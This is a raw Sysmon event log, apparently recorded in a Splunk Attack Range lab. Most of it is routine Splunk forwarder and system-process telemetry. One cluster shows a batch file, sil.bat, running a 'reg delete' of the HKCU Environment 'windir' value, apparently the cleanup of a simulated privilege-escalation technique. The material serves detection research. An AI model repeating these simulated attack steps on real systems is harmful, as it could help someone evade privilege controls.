Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF5C0245B43583E3CBCE101601AD6E3B,SHA256=60B3149314316C11AA685B4A50EBD48BDFDE95FAC5D62774BEE5354AACE57A45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051044Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:22.826{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7746F372F018E078C95A69C44C3AE0C1,SHA256=8BE0A21C9EAF7159E722FA8A0D7548C583C7E3EE74F0E959809C32760CA89C3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808448Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:22.166{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D58FF22968CFDCF1CA3D2942D91D6BA,SHA256=85E1645E732F203D3B0CAE3E0CD6CEEE0B6AD27420EF2E6B04E1F13A3483B2E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051043Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:22.556{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=B12BEE46ED377316EA6C187CB1F3571E,SHA256=56035FDE68C07F3EB022F32B21D586D40ED9B569611348F7BDCA28C1F1D2A664,IMPHASH=00000000000000000000000000000000falsetrue 12241200x80000000000000001051042Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:57:22.179{466BC892-F5E2-60EB-807D-00000000CF01}928C:\Windows\system32\reg.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\Environment\windir 10341000x80000000000000001051041Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:22.170{466BC892-F5DD-60EB-757D-00000000CF01}969210124C:\Windows\system32\conhost.exe{466BC892-F5E2-60EB-807D-00000000CF01}928C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051040Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:22.163{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051039Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:22.163{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051038Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:22.162{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051037Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:22.162{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051036Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:22.162{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5E2-60EB-807D-00000000CF01}928C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051035Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:22.162{466BC892-F5DC-60EB-747D-00000000CF01}43042332C:\Windows\system32\cmd.exe{466BC892-F5E2-60EB-807D-00000000CF01}928C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051034Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:22.162{466BC892-F5E2-60EB-807D-00000000CF01}928C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg delete "HKCU\Environment" /v "windir" /FC:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 23542300x80000000000000001051046Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:23.840{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E14FF1EBF5E72B6FD50DC74DDBAEF7D3,SHA256=FDE38FA3E9B56657DD88A6858119DD83D328F2AE129149AC2EACA00ED1260515,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808449Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:23.166{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6A3C69BBEA427625B8090475841DE68,SHA256=232B60C4C9EC83CFF66929E6D8928906437A46F542CE308A888B32B087ED8B88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051045Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:23.176{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0C1A7879348310697402784045F3CD40,SHA256=D74E9AC8D39727063608EC59DC26094F9E2998D13D5920F8AC0AB6C891D3A9AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051048Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:24.853{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EAF95ADFFDCBFE17EAF0E7B359AC21E,SHA256=A8C468075EAB3A8B1D4E73A068CACB82AFD050730EFE5DC1EB532E443CB9611D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808463Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.322{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5E4-60EB-9679-00000000D001}3924C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808462Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.322{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808461Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.322{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808460Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.322{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808459Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.322{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808458Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.322{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808457Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.322{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808456Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.322{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808455Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.322{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808454Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.322{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808453Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.322{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F5E4-60EB-9679-00000000D001}3924C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808452Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.322{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5E4-60EB-9679-00000000D001}3924C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808451Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.307{0C1E0330-F5E4-60EB-9679-00000000D001}3924C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808450Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.197{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=942256A61058D2F67763136402B32027,SHA256=A834EF5BA67529F124C82F0E2FA84116EE9CD5B842830B834D135B9B44065D52,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051047Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:15.624{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51098-false10.0.1.12-8000- 23542300x80000000000000001051049Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:25.860{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0EEE23A7FFC88AF33B42F263FB4D6D5,SHA256=C60BB33E17A5285DE680B51FF3F9CD56D9CEB247C852DC2F1346F6D173F71831,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808494Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.791{0C1E0330-F5E5-60EB-9879-00000000D001}27963076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 